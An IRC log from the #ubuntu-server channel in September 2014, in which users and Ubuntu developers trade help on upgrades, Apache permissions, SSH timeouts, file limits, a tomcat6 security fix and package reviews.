<lordievader> 13.04 and 13.10 are EOL.
 * RoyK knows
<lordievader> Mississauga might not ;)
<RoyK> anyway, I wouldn't use 14.10 on a server either, when it gets released
<Mississauga> so I guess 14.04 ok for server
<cfhowlett> Mississauga, 14.04.1 ??
<RoyK> Mississauga: yes
<Mississauga> whats that last  .1 ?
<RoyK> Mississauga: patch level
<RoyK> Mississauga: just use 14.04.1
<cfhowlett> Mississauga, point release current version
<Mississauga> I looking to buy a book on it to keep around,  anyone familiar with this book ?"Ubuntu 14.04 Lts Server: Administration and Reference"
<Mississauga> by Richard Leland Petersen
<cfhowlett> Mississauga, nope.  but I'd suggest "the official ubuntu server book"
<Mississauga> so whats wrong with it?
<hallyn> dannf: congrats :)
<RoyK> Mississauga: he said he didn't know it, just suggested something else :P
<dannf> hallyn: thanks! to you as well, belated :)
<^^x^^> it's reeeeeally quite in here
<arrrghhh> ^^x^^, it is quite quiet.
<^^x^^> arrrghhh: were you under distress when creating that nickname? ;P
<arrrghhh> potentially, t'was a while ago.  some sort of duress was taking place I'm sure.
<^^x^^> :)
<funman_> hey folks
<funman_> is it easy to upgrade 13.04 to 14.04
<arrrghhh> funman_, 13.04 is not LTS so you can't go directly to 14.04
<funman_> hmm
<funman_> my server provider offers 13.04
<arrrghhh> you'd have to do 13.10 --> 14.04.  would be better to just do a clean install of 14.04 and stick to LTS releases
<funman_> 14.04 is LTS?
<arrrghhh> yes.  every 2 years - 12.04 is LTS, 14.04 is LTS
<arrrghhh> so you can go from 12.04 -> 14.04
<funman_> i asked them to install 14.04
<funman_> lets see :D
<arrrghhh> ya clean install would be better
<funman_> if they agree
<arrrghhh> then upgrade every 6 months or so... or just keep it on LTS releases
<arrrghhh> I prefer LTS for my servers.
<funman_> lol Take a picture of yourself holding a valid photo ID.
<funman_> wtf
<funman_> server provider responce
<maxb_> It's perfectly valid to upgrade from 13.04 to 13.10 to 14.04. You just have to upgrade twice in succession
<arrrghhh> I never said it was invalid... just cannot do it in one step, and a clean install would be preferred.
<maxb> I don't think there's any reason to prefer a clean install
<maxb> Unless there are other factors entirely separate to upgrading which make a clean install attractive
<arrrghhh> ya, upgrades can fail.  clean installs have a better chance of working ;)
<funman_> :P
<maxb> A somewhat pessimistic viewpoint
<arrrghhh> sure, but I can back it up with experience.
<arrrghhh> IF a clean install is an option it is ALWAYS preffered IMHO.
<arrrghhh> preferred, stupid language
<arrrghhh> also, it would be quicker assuming he doesn't have a ton of crap in 13.04 already
<lordievader> I'd say a clean install is a last resort. I've done many upgrades, haven't got a failed upgrade recently.
<arrrghhh> used to happen all the time.  maybe it's gotten better, I haven't done an upgrade in a  while lol.
<maxb> Indeed. There's little point making useless work for yourself, and rebuilding the systems installed on top of the base OS is useless work if you can easily avoid it
<arrrghhh> I backup my config files, no big deal.
<sarnold> upgrading through a release that has -also- hit EOL can make an upgrade really annoying
<sarnold> especially if the mirrors have reclaimed the storage space and you're forced to use old-releases or whatever
<maxb> Upgrades very rarely fail. Sometimes they run into issues requiring a little more manual intervention than would be preferred, but that's still usually less work than clean install. This isn't Windows, after all :-)
<arrrghhh> well, there's that too ^^ if you're on a really old release
<arrrghhh> maxb, and maybe on the server platform that is true.  all of my terrible upgrade experiences have occurred on the desktop platform.
<sarnold> funman_: please ask the provider to take down the 13.04 and 13.10 options -- this chart may be useful in convincing them :)  https://wiki.ubuntu.com/Releases
<arrrghhh> x1,000 ^^
<funman_> lol
<maxb> I had a desktop that I upgraded every six months for about four years, with very little problems.
<arrrghhh> maxb, it got better after 10.04 I noticed.
<arrrghhh> which, was 4 years ago :/  crap I'm getting old
<maxb> I started with 6.06 :-)
<arrrghhh> 7.04 haha
<maxb> Though I do acknowledge other people in my office seem to have more problems than I do.
<arrrghhh> ya maybe it was customized crap I was doing.  dunno, my parents machines I haven't had much issue upgrading.
<^^x^^> time to work. Hasta luego
<^^x^^> crap, when I run apache2ctl as normal user apache says it can't read a particular apache2.conf file but if I run the command as root everything is fine??
<sarnold> ^^x^^: check ls -lad for every directory in the path and then the final file; make sure the unix permissions allow the user to read the file and traverse the directories, if that's the goal..
<^^x^^> sarnold: yes, it's the goal. I wasn't sure I needed to provide permission across the whole path
<^^x^^> but I want to know why apache2ctl gives back different errors when run by user/root Â¿?
<sarnold> ^^x^^: probably just 'x' directory access is sufficient
<^^x^^> will try right now
<^^x^^> thanks
<^^x^^> have the second answer? ;P
<sarnold> probably due to the first answer :) hehe
<^^x^^> but i don't get it, apache is run by www-data weather I check stuff with apache2ctl as root or user, right?
<sarnold> the change to www-data is after a significant amount of processing, including opening the listening ports (80 and 443 require the CAP_NET_BIND_SERVICE capability, so it starts as root)
<^^x^^> uhm, but I have like 10 apache2 processes
<^^x^^> 1 as root and the rest is www-data
<^^x^^> which one is it?
<sarnold> ^^x^^: I -think- the one process is left running as root in case you wish to add another listening socket and reload the configuration -- if it dropped root entirely, some 'simple' changes like that would require a full restart
<^^x^^> that makes sense
<^^x^^> I still don't understand the apache2ctl thing
<sarnold> it runs with whatever privileges you have when you start it
<^^x^^> apache2ctl runs with whatever I am at that moment??
<sarnold> when you run it as you, it gets only your privileges, which may not allow it to read all the configuration files; but when you run it as root, it can bypass the permissions if needed to read the configuration files
<^^x^^> but that's incredibly confusing, because when I run it as a normal user it complains about permission issues but it says "apache2: bla bla" at the beginning
<^^x^^> so what that's saying to me is that it is apache2 who has permission issues, not apache2ctl, jesus
<^^x^^> right?
<sarnold> ^^x^^: probably the 'apache2: ' label is just letting you know which program is complaining.
<^^x^^> which stresses my point
<^^x^^> :\
<^^x^^> http://i.imgur.com/BMfcR4H.png
<^^x^^> that's confusing to me
<sarnold> ^^x^^: I'm confused what point you're trying to make? :)
<^^x^^> let's try with that screencap haha
<^^x^^> sarnold: do you not get confused by the "apache2: " there?
<^^x^^> it really seems like apache2 is not reading that file. If that's the case, it's the thing apache2ctl should report when run as root
<sarnold> ^^x^^: no, it's just a helpful annotation about which program didn't like the input
<sarnold> ^^x^^: how could apache2ctl report it when run as root? the permission check is bypassed when you run it as root
<^^x^^> sarnold: because if it is apache2 who is having the problem, is going to have it anyways. I'm running apache2ctl as root, not apache2
<^^x^^> see what I mean?
<^^x^^> apache2ctl is the program I'm always running, I'm not doing anything to/with apache2
<sarnold> ^^x^^: but the /etc/init.d/apache init script runs as root and starts apache as root
<^^x^^> but I'm not doing anything with that
<sarnold> ^^x^^: here, this might help :)  http://sources.debian.net/src/apache2/2.4.10-1/debian/apache2ctl/?hl=47#L47
<sarnold> ^^x^^: apache2ctl is a simple little wrapper that runs /usr/sbin/apache2 to do a lot of the actual work
<^^x^^> oh crap, I didn't know that
<^^x^^> xD
<sarnold> :D
<^^x^^> so I should run apache2ctl as www-data to really see wtf is wrong? xD
<^^x^^> because otherwise there's always user-bias
<sarnold> ^^x^^: well, what problem are you trying to solve? :)
<^^x^^> i want to find out if apache2 is reading all my *.conf files
<^^x^^> check more than "find out"
<m_tadeu> does anyone know the difference between "sudo service xxx start" ans "sudo start xxx"?
<Guest48535> m_tadeu: service starts older sysv scripts, while starts is for upstart ones, i think
<m_tadeu> Guest48535: thanx...I'll look into that
<patdk-wk> heh? service starts EVERYTHING :)
<patdk-wk> they did create man pages for this purpose :)
<patdk-wk> service starts an sysv or upstart script
<patdk-wk> start starts a sysv script
<rurkowce> i was close enough :V
<patdk-wk> by being 50% wrong? sure :)
<patdk-wk> I had to switch to service to handle upstart
<m_tadeu> patdk-wk: so the way to go is "service start", correct?
<patdk-wk> service xxxxx start
<m_tadeu> yes
<m_tadeu> patdk-wk: thanx a bunch for the enlightnment
<mikal> Hi
<mikal> Is there a cloud archive for 14.04?
#ubuntu-server 2014-09-23
<zul> mikal: yes there will be when its ready
<mikal> zul: is it hard to get a newer libguestfs into there?
<mikal> zul: see http://lists.openstack.org/pipermail/openstack-dev/2014-September/046764.html for reference
<zul> mikal: no its probably not
<mikal> zul: cool
<Thumpxr> Hey :) #ubuntu send me here. Currently i have a debian server but want to migrate it to ubuntu.. is there a common way to do this?
<Laibsch> I have a Lucid server and need a newer PHP5 for owncloud.  I am wondering if it would be a better idea to backport the php5 package or virtualize apache and php5 in a container.  Updating the host to precise or trusty is unfortunately not an option.
<Laibsch> opinions?
<Interactive> I've got an urgent problem with the work server. The open file limits for the user couchdb is too low.
<Interactive> How do I change that?
<Interactive> I already altered /etc/security/limits.conf
<Interactive> #For couchdb
<Interactive> *               hard    nofile          5242880
<Interactive> *               soft    nofile          5242880
<Interactive> root            soft    nofile          5242880
<Interactive> couchdb         soft    nofile          524288
<Interactive> And added "session    required   pam_limits.so"  to /etc/pam.d/su
<Interactive>  This does not seem to raise the  files limit.
<Interactive> What else do I need to do?
<Interactive> Laibsch: In the same situation what I did was install a newer ubuntu in a chroot environment.
<Interactive> It works but is not ideal (no option is :-) )
<Laibsch> what virtualization did you use?
<Laibsch> just plain chroot?
<Laibsch> or a more sophisticated containter?
<Laibsch> or a more sophisticated container?
<Laibsch> as to your problem, maybe some service needs to be restarted?
<Interactive> Laibsh: I used just plain chroot. I installed a newer version of ubuntu with debootstrap.
<Interactive> I expect something needs to be restarted, just don't know which.
<Laibsch> couchdb? look through the dependencies of couchdb, maybe that will give you a hint
<Interactive> I restarted couchdb but that did not solve the open file limit problem :-)
<Laibsch> Interactive: Can I private message you for some of the details of your chroot solution?
<Interactive> Laibsch: Sure.
<sudormrf> hello all! having an issue with openvpn server.  getting an error that says auth-pam background user failed to authenticate error in service module
<sudormrf> nm
<sudormrf> solved
<Vladimir_> is it possible to copy paste from windows note pad to VI editor in ubuntu-server ?
<Interactive> Yes :-)
<Interactive> Ctrl-shift-v to paste in a terminal
<ivoks> or middle click
<ivoks> or shift insert
<Vladimir_> thanks guys
<btcquant> Help - just found out my server was hacked.  Running 12.04.  I see a *second* account with root privilages.  Want to figure out how they got in.
<btcquant> Ran rootkit scanner and it found nothing
<Interactive> Which rootkit scanner?
<btcquant> Can anybody suggest some diagnostic tips?
<Interactive> Look at /var/log/auth.log
<lordievader> Good morning.
<Interactive> Run rkhunter and chkrootkit
<Interactive> Make sure you install them from a trusted source.
<Interactive> But in the end, if you server is compromised it's difficult to be sure the "cracker" no longer has access to your server.
<TJ-> btcquant: Take it off-line, then either work from a Live boot environment or image the root file-system and boot-loader. If you don't suspect local compromise via console, look at which remote services were available, and then examine those services and supporting infrastructure. Look for signs of log-file tampering; those may all give you clues as to when the compromise started.
<SP33D> i am maybe outdated :(
<SP33D> how to handle ip's this days
<SP33D> i think ifconfig and /etc/network/interfaces are wrong
<SP33D> nothing works :D
<SP33D> i find stuff with ip addr that don't shows anything in ifconfig thats wirred for me
<TJ-> SP33D: "ifconfig -a" will show the same list of interfaces that "ip link show" will. "/etc/network/interfaces" is used by ifupdown.
<SP33D> TJ how would u set up a machine that got more then one ip
<SP33D> i am normaly doing edit of interfaces and add lines for eth0:1 and so on
<SP33D> also called aliases
<SP33D> but i can't ping them i don't know whats wrong
<TJ-> SP33D: Routing? Firewall? Incorrect sub-net? .... many reasons can cause that
<SP33D> maybe this was to much and i should only use ip addr
<SP33D> ya i think i simply over engeneered it
<SP33D> with my costum mac addresses and all
<SP33D> ;D
<TJ-> SP33D: You mean broke it so you can learn how to fix it?
<SP33D> ya maybe htat
<SP33D> but don't got time to fix that i should do other stuff first
<SP33D> as long as one ip works
<SP33D> :D
<jamespage> zul, sorry I pushed some changes to the neutron packaging branch in error - but I'd just finished testing them so went ahead and uploaded
<jamespage> zul, pending release team review
<jamespage> (ff in effect)
<vooze> Hi, I'm connecting to my server (14.04) with SSH, after a short time it will disconnect. Is this timeout time set in the server or client?
<Interactive> vooze: Maybe this will help: https://docs.oseems.com/general/application/ssh/disable-timeout
<vooze> Interactive thanks, lets see if it works :)
<Interactive> :-)
<rbasak> vooze, Interactive: the solution in that article looks correct, but the explanation isn't.
<rbasak> Most ssh servers don't time out clients.
<rbasak> But many clients are connected to a server through a NAT device, which does timeout.
<vooze> Maybe its the client then :D Server is Ubuntu, client is OSX
<Interactive> rbasak: did not know that :-)
<rbasak> If your client has a "private" IP address like 10.x.x.x or 192.168.x.x, then you're connected via a NAT device.
<vooze> rbasak it happens both when connecting from school (not on the same network) and at home
<rbasak> Most clients are behind NAT. That probably includes both your school and your home.
<vooze> rbasak so there is nothing to do to extend the timeout ?
<rbasak> vooze: no, not at all. Use the same solutions to extend the timeout. They still work. It's just that the reason is not accurate. The solutions are fine.
<rbasak> (I think; I didn't look too closely)
<rbasak> I usually use "-o ServerAliveInterval=55" which usually caters for even the most aggressive NAT.
<rbasak> (and it's useful for unreliable connections to detect frequent disconnects, too, since you can't resume a NATted session without reconnecting anyway).
<rbasak> So I combine that with screen usually.
<vooze> rbasak well its not really a big issues, its just a little annoying, so I don't need to use screen. But thanks for the ideas anyway :)
<vooze> So If i understand it correctly, the 55, will mean that every 55 sec. it wil make sure it does not timeout?
<rbasak> Every 55 seconds it will send some data, which will mean that intermediate devices (eg. a NAT device) will consider the connection to still be alive.
<rbasak> This generally will cause those intermediate devices to not time out the connection.
<rbasak> For 55 seconds, a device set with a timeout of 60 should generally not time it out.
<vooze> rbasak okay :) Lets see if i did it correctly after like 10 mins :) thanks for all
<Thumpxr> Which SSH client do you all use ? Looking for a client as i migrate  from Win to ubuntu. Need Something like mRemoteNG / SecureCRT..
<queeq> Thumpxr: Client for Linux?
<Thumpxr> queeq: yes
<queeq> It has built-in client.
<queeq> Do you have any special requirements?
<queeq> Here is the man for it: http://linuxcommand.org/man_pages/ssh1.html
<Thumpxr> queeq: I need scripting, multiple sessions, Port Forwaring, SCP and best would be support for my KeePass Database..
<lordievader> Thumpxr: I suppose most simply use the openssh-client (ssh).
<queeq> port forwarding and scp are available from the start. Multiple sessions... Well, you can run multiple clients from, say, screen or just different windows (if you are on desktop linux). Scripting is also possible (so you may include ssh command in scripts)
<queeq> KeePass... That's unlikely
<lordievader> Well perhaps you can script something together with expect and keepass.
<queeq> You can alternatively use ssh keys to login and, say, keychain to eliminate constant password typing
<lordievader> ^ that would be better ;)
<queeq> Yep, that's the standard method for that
<Thumpxr> queeq: already have ssh keys.. lordievader: i found PAC Manager has build in KeePass support. Are there any known issues with?
<lordievader> I'm not familiar with PAC Manager. 'ssh' works for me.
<Thumpxr> lordievader: How many sessions do you maintain at once ? Where i work its sometimes like 50+..
<queeq> Great, so all you need to do is to put them in ~/.ssh/ and, if they are different for different hosts, attach them to particular hosts in ~/.ssh/config
<queeq> Thumpxr: woah, that's a lot. How do you manage to quickly switch between them?
<queeq> Why would you need so many anyway?
<Thumpxr> queeq: right now with SecureCRT. but i already tested it on ubuntu and got some misfunction. Why? I maintain the network of DLR
<_ruben> securecrt is the bomb, on windows atleast ;) got 72 tabs open spread over 9 windows
<pmatulis> morning peeps
<Thumpxr> hey
<zul> jamespage: ack
<mdeslaur> rbasak: do you have any idea why my nginx merge failed the autopkgtests?
<rbasak> mdeslaur: yeah, we've been discussing it in #ubuntu-devel.
<mdeslaur> ah! /me goes to read backscroll
<rbasak> mdeslaur: see scrollback there from about an hour ago.
<mdeslaur> rbasak: oh, hehe...so the previous tests were false positives then :)
<mdeslaur> rbasak: thanks for bringing that up, I was a bit stumped and was a bit too swamped to take a look at it properly today
<rbasak> mdeslaur: no problem. I'll file a bug for fixing the environment or finding some other solution I think.
<zubairahmed> Can anyone suggest some good certification entry level for Network administration or server administration?
<iclebyte> zubairahmed,  LPIC1
<zubairahmed> iclebyte, Thank you.
<zubairahmed>  CompTIA Linux+  and ITIL Are these any good? iclebyte
<zubairahmed> Also CCNA iclebyte
<iclebyte> zubairahmed, I've not done them. I did LPIC1 and LPIC2 - although to be honest the industry doesn't seem to bothered by them, from an employee perspective RHCE seems to have the most respect
<iclebyte> CCNA isn't a systems administation course.
<iclebyte> it's cisco specific networking
<iclebyte> well.. all networks but on cisco kit.
<iclebyte> CCNA will open doors
<iclebyte> i'm studying for mine at the moment.
<zubairahmed> Thanks iclebyte
<rbasak> coreycb: looking at bug 1371805, it looks good. Though one thing I didn't consider before.
<uvirtbot> Launchpad bug 1371805 in python-django-openstack-auth "Please merge python-django-openstack-auth 1.1.6-3 (main) from Debian unstable (main)" [Wishlist,Confirmed] https://launchpad.net/bugs/1371805
<rbasak> We're in feature freeze. Do you consider the upstream changes to be OK for that?
<disposable> i have a trusty exporting a zfs volume via nfs v3. in /etc/exports i have "/pool1/home 192.168.100.0/24(rw,sync,no_subtree_check,no_root_squash)". When I mount the share from a debian wheezy host (kernel 3.2) everything works as expected, but when I try to mount it from another ubuntu trusty machine, I get nosuid,nodev,noexec as my mount options even if is specify manually that i want suid,dev,exec. exported directories are owned by uid 10
<disposable> s/if is/if i
<coreycb> rbasak, hey
<rbasak> o/
<rbasak> Sorry I didn't think of this before. It's not good from your point of view - better for you to have all review comments in one go, and I failed there, sorry.
<coreycb> rbasak, oh not a problem, thanks for reviewing
<coreycb> rbasak, I don't see a problem with the fix re: sru
<rbasak> coreycb: we're pulling in all the other changes that can with 1.1.6.
<rbasak> I don't object to that, as long as we consider them all bugfixes.
<coreycb> rbasak, maybe we want to ping jamespage
<rbasak> I was just thinking that :)
<jamespage> rbasak, its a minor version bump and is actually required for horizon
<jamespage> so +1
<rbasak> jamespage, do you consider this to be OK? https://launchpadlibrarian.net/185492093/ubuntu_ubuntu.debdiff
<rbasak> Oh OK.
<rbasak> No problem then.
<rbasak> I'll check and upload shortly.
<coreycb> rbasak, jamespage, thanks guys
<rbasak> coreycb: I might just add "to fix FTBFS" in the changelog entry to make it clear.
<rbasak> If you're OK with that.
<coreycb> rbasak, that sounds good, thanks
<arosales> beisner: to confirm am I up to chair the ubuntu-server meeting
 * arosales looking @ https://wiki.ubuntu.com/ServerTeam/Meeting
<beisner> arosales, ack ok.  appreciate it!
<beisner> ps welcome back!
<arosales> beisner: thanks for runningprevious meetings
<arosales> beisner: btw the rotation looks to have you next @ https://wiki.ubuntu.com/ServerTeam/Meeting
<arosales> so you may want to take a look at that
<arosales> but I recall you had chaired in previous weeks to cover for me :-)
<beisner> arosales, actually, james hopped in last wk to make up for his cycle, i am really up next, so plz leave me as next chair when you update.  thx!
<arosales> beisner: ah ok so you are up next and I am up today
<arosales> gotcha :-)
<beisner> yep
<psivaa> arosales: sorry i missed the meeting, i am trying to find someone to attend the meeting
<arosales> psivaa: no worries, thanks for finding an ongoing rep. Always good to hear from QA
<psivaa> arosales: ack
<grendal_prime> anyone doing virtualization with kvm?
<grendal_prime> i got this issue with live migration that is driving me bonkers.
<grendal_prime> i can migrate the windows servers but any guests that are linux go into read only as soon as the migration starts.
<jamespage> bug 1371526
<uvirtbot> Launchpad bug 1371526 in linux "ceph-disk-prepare command always fails; new partition table not avaliable until reboot" [Undecided,Incomplete] https://launchpad.net/bugs/1371526
<grendal_prime> so it just does that on first boot?
<grendal_prime> that doesnt make any sence as im seeing it on several machines
<grendal_prime> is there a way to just disable the remount in ro ?
<grendal_prime> i know that sound like a bad idea..but..i mean..i would like to do some tests to see if it is actualy all that bad.
<grendal_prime> im assuming i can adjust it in fstab and ..well hell ill try that first
<zeroNones> hey guys not sure where to ask this but where can I find out why my ssl shows its not secure?
<ivoks> who signed your ssl?
<ivoks> or, your certificate
<zeroNones> sorry I found it ivoks I had svg's in the document that pointed to a http schema but I just changed it to https and it validates now :)
<grendal_prime> i do not see how that bug could only affect one person
<grendal_prime> bug 1371526  this blows
<uvirtbot> Launchpad bug 1371526 in linux "ceph-disk-prepare command always fails; new partition table not avaliable until reboot" [Undecided,Incomplete] https://launchpad.net/bugs/1371526
<grendal_prime> well i let them know i can reproduce it...on a grand scale
<patdk-wk> I can't, but then, I have never use ceph-disk-prepare before
<jamespage> patdk-wk, somehow I doubt that is the same issue - my one was on utopic not 14.04
<jamespage> and has gone away...
<patdk-wk> heh?
<jamespage> grendal_prime's
<PheLe> Hi guys. I just moved a website from another server to an ubuntu server. Now I'm having a problem with file permission and ownership group. Can anyone give me a direction with this problem?
<PheLe> Anyone here?
<liox_> hello
<liox_> Hello I run Ubuntu 12.04 Server on my VPS. Was working with PHP 5.3 and I upgraded to PHP 5.4. Apparently the process was perfect. But now noticed a problem in developing an App for facebook after you add the Tab to access it opens a window Download to download the index.php and the console shows me: Resource interpreted the Transferred Document but with MIME type application / x httpd-php
<liox_> But when I access the application outside of the tab it runs normally
<liox_> Can anyone help me?
<liox_> opas console see Resource interpreted as Document but transferred with MIME type application/x-httpd-suphp
<liox_> plis helpme
<gcds> Hello, I am trying to install Ubuntu server 14.04.1 on newest asus motherboard... I am trying to make a Software raid setup on two 1tb hdd. I trying to make a boot partition with bootable flag on but it doesnt enable if try to install without boot flag nothing starts up after instalation...
<RoyK> I've installed u1404 and a lot more with bootable r1 setups
<gcds> Maybe someones knows how to enable that bootable flag on instalation partitionier?
<RoyK> gcds: just make a small raid-1 for the /boot, don't care about the boot flag
<gcds> RoyK: It worked for me on virtualbox
<gcds> RoyK: It doesnt start up after installation or ends up with failed grub install
<RoyK> the boot flag doesn't matter much when grub is in business
<gcds> maybe because of UEFI ?
<gcds> it doesnt start just enters to bios
<gcds> if i insert ubuntu server install it starts
<Patrickdk> are we talking mbr? or gpt?
<gcds> I dont know ubuntu server install doenst let to choose
<gcds> I am using Asus H97I-PLUS
<sarnold> gcds: see if you can use alt-f2 or f3 or something to get another console just before rebooting and see if gdisk or fdisk recognize the thing and let you fiddle with flags as you want
<gcds> sarnold: I donkt know maybe its not a flag problem...
<Patrickdk> damn :( someone stole my server name
<Patrickdk> mugen power :(
<Patrickdk> I named my big zfs server mugen
<Patrickdk> mugen == japanese for unlimited
<Patrickdk> infinate
<gcds> Hmm, guys have problem with grub-install
<gcds> it was executing grub-install /dev/sda /dev/sdb and throwed error Unable to install grub in /dev/sda
#ubuntu-server 2014-09-24
<Vladimir> I can't see any errors with this crontab line: 00 00 * * * root /admin/run_backup_switch.sh  it should execute that skript every midnight but it doesn't seem to to that
<lordievader> Good morning.
<Vladimir> lordievader: morning=)
<lordievader> Hey Vladimir, how are you?
<Vladimir> It's fine
<Vladimir> lots of rain thou
<Vladimir> and how are you? lordievader
<lordievader> Doing good I suppose, haven't had coffee yet.
<Vladimir> great times after coffe then..
<Vladimir> lordievader: working with linux are you?
<lordievader> Vladimir: At times, yes.
<|\n> hey guys, there is https://bugs.launchpad.net/ubuntu/+source/rsyslog/+bug/459730 is it safe to comment out those lines referring xconsole?
<uvirtbot> Launchpad bug 459730 in rsyslog "rsyslog doesn't create /dev/xconsole " [High,Triaged]
<|\n> anyway, what are my options? maybe i shouldn't pay much attention to it
<JesseDhammu> google
<Patrickdk> google is lmgtfy.com
<NikP> In the console my monitor blanks every 10 mins. How can I disable it? Pretty annoying with an LCD.
<henkjan> any change tomcat6 in trusty is being updated for http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-0099.html ?
<uvirtbot> henkjan: Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header. (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099)
<jdstrand> henkjan: yes, it is assigned to mdeslaur
<rbasak> jdstrand: tomcat6 is in universe in Trusty though.
<jdstrand> oh right
<jdstrand> mdeslaur only did the supported releases
<mdeslaur> henkjan: someone from the community would need to file a bug and contribute a debdiff to fix it
<jdstrand> right, so someone needs to provide a debdiff and test and coordinate with the security team
<mdeslaur> henkjan: at which point we would sponsor the fix
<mdeslaur> whoops, sorry for colliding :)
<henkjan> jdstrand: rbasak mdeslaur thnx for the update.
<henkjan> maybe i'll look into it
<rbasak> henkjan: if you could, that would be great and would be appreciated.
<rbasak> We're always looking for more people to join in and help maintain universe.
<mdeslaur> henkjan: there are a few other CVEs that need fixing at the same time: http://people.canonical.com/~ubuntu-security/cve/pkg/tomcat6.html
<mdeslaur> henkjan: alternatively, you could migrate to tomcat7 which is supported for the lifetime of the LTS
<henkjan> mdeslaur: customer cant migrate to tomcat7 at this moment
<henkjan> currently migrating 8.04 to 14.04 :)
<mdeslaur> henkjan: I see
<mgw> was there a regression on this in Trusty: https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/352384
<uvirtbot> Launchpad bug 352384 in ifupdown "can not add vlans to a bond network device" [Undecided,Fix released]
<mgw> im getting "operation not supported" trying to bring up a vlan interface on top of a bond
<mgw> bond0.200
<mgw> I'm pretty sure the identical setup was working in Precise
<rbasak> mgw: I think there have been configuration changes in /etc/network/interfaces required since then.
<rbasak> mgw: so it may still work, but your interfaces file may need to look different.
<mgw> rbasak: thanks -- any idea what those changes are?
<mgw> I'd paste my config, but I can't copy from my kvm UI
<rbasak> mgw: http://bazaar.launchpad.net/~ubuntu-branches/ubuntu/utopic/ifenslave/utopic/view/head:/debian/README.Debian
<mgw> I don't think it's the bonding that's the problem -- bond0 is coming up
<mgw> it's the vlan on top of the bond
<rbasak> mgw: I'm not sure that this applies to your particular case, but best to check that the configuration is correct against the current documentation, rather than against the previous configuration in 12.04.
<rbasak> mgw: and http://manpages.ubuntu.com/manpages/trusty/en/man5/vlan-interfaces.5.html for the VLAN end.
<rbasak> mgw: if it still doesn't work, please do file a bug.
<mgw> rbasak: thanks
<m_anish> Hi. I'm trying to install an ltsp server on a VM.. and test it with virtualized clients on the same host
<m_anish> what should be my network configuration, the virtualized clients will obv boot from PXE
<m_anish> and I can get the server to run dhcp on one interface.. but not sure what that interface type should be
<jrwren_> m_anish: you'll need to turn off the VM systems DHCP.
<m_anish> jrwren_, okay. I'm using Virtualbox.. what should be my network type for starters.. I have it set to NAT (for WAN on the server) and Internal network for the LTSP LAN
<jrwren_> m_anish: once you do that, provate or nat should work.
<m_anish> jrwren_, is that correct?
<jrwren_> m_anish: it might be correct. it depends :)
<m_anish> jrwren_, :) I see that I have both eth addresses for NAT and internal network on the server.. so something gave the second virt. n/w interface it's ip and there is a dhcp running somewhere :/
 * m_anish STFWs on virtualbox+dhcp
<jrwren_> m_anish: yes, virtualbox is doing it. You'll have to turn that off
<m_anish> aha, okay
<m_anish> jrwren_, think I figured out the culprit... https://www.virtualbox.org/manual/ch08.html#vboxmanage-dhcpserver
<jrwren_> m_anish: sounds right.
<m_anish> okay.. onwards to building ltsp client images
<m_anish> jrwren_, thx.. dhcp _seems_ to be working .. real test will come when virt client actually boots ;)
<smb> rbasak, You like to get a patch for bug 1372368? :)
<uvirtbot> Launchpad bug 1372368 in uvtool "VM creation fails on Utopic" [High,Triaged] https://launchpad.net/bugs/1372368
<smb> rbasak, attached it to the bug report
<rbasak> smb: thanks. I've been working on fixing this within libvirt, but I can apply that if it's a pain for users on Utopic for now.
<rbasak> smb: hallyn had something similar in http://paste.ubuntu.com/8375393/
<smb> rbasak, It might be actually a feater. Not sure. But not being able to use uvtool might be a bigger pain
<smb> heh, two evil minds, one solution more or less :)
<rbasak> There should be a way in libvirt to hand a raw image that happens to be an ISO image to libvirt to be presented to the VM as a second disk.
<rbasak> Having delved into the code I'm pretty sure it's a bug (and regression) in libvirt. I'm working on it :)
<rbasak> I'll upload the fix to Utopic as a package diff though at least for now.
<rbasak> Since you're the second person to notice.
<rbasak> Probably won't get to it until tomorrow though.
<rbasak> If someone wants to upload in advance of me, please do.
<smb> Its not that urgent now. Just stumbled over it. Alternatively you could not pass any driver element. What I am not sure is whether autodetecting the iso format when you create the volume is a bug or a feature.
<smb> But I will let you duke that out with libvirt upstream :-P
<jdstrand> stgraber, hallyn: what is the relationship between start-container and container-base?
<maddawg2> can anyone help me figure out my dhcp server... i'm having issues
<maddawg2> and i dunno what's going on lol
<maddawg2> i've just installed dhcp3-server
<stgraber> jdstrand: container-base is what any container should have, start-container is the extra set required to make lxc-start happy. so the lxc-start profile is basically start-container, a basic container profile is basically container-base, a container that can do nested containers will have both
<maddawg2> trying to get it to hand out IPs on eth1 in the 192.168.1.50 to 192.168.1.100 range
<maddawg2> and i cant figure out why it wont hand any addresses out
<jdstrand> ok, thanks
<maddawg2> it doesnt even look like the service will start
<maddawg2> it just says stop/waiting
<maddawg2> nvm it now says it's running but nothing is getting an IP :-\
<maddawg2> what could be wrong?
<henkjan> mdeslaur: re 16:01. just uploading 6.0.41 to universe for 14.04 isnt an option?
<mdeslaur> henkjan: that would likely break people's configuration and setup and new versions change settings and introduce features
<mdeslaur> if you want to run the latest version, I'm sure some people maintain it in a ppa somewhere
<henkjan> mdeslaur: running the latest would be the easiest way :)
<henkjan> but i'll try to patch 6.0.39
<mdeslaur> henkjan: if you're lucky, perhaps the utopic package will work on trusty
<henkjan> maybe i can help some other people with a patched version
<mdeslaur> henkjan: of course, that will only solve the issue short-term
<henkjan> mdeslaur: long time solution is migrating my customer to tomcat7
<mdeslaur> henkjan: yes
<henkjan> mdeslaur: patching al affecting CVE's in 1 debdiff is considered okay?
<mdeslaur> yes, that's fine, as long as you make each fix a different patch inside the debdiff
<mdeslaur> henkjan: see here: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures#Preparing_an_update
<henkjan> i go read :)
<mdeslaur> henkjan: great. You can ask questions in #ubuntu-hardened
<jamespage> jdstrand, zul: in order to avoid the sync hell that the release team are ignoring me about I have a different approach to the xstatic assets for horizon to propose
<jamespage> which was one we did discuss last week - bundling the assets back into horizon
<jamespage> I have it working with a multi orig tarball setup OK
<jamespage> and a patch
<jamespage> but it does limit the use of the assets to just horizon
<jamespage> lemme know what you think
<zul> jamespage:  can you place it somewhere where I can have a look?
<Maxel> Question: I am trying to execute a command in a shell script on startup. I want to launch a java program (a teamspeak3 bot) what command should I be using? is it exec "my command"?
<sarnold> Maxel: check the @reboot entry in crontab(5) for an easy approach..
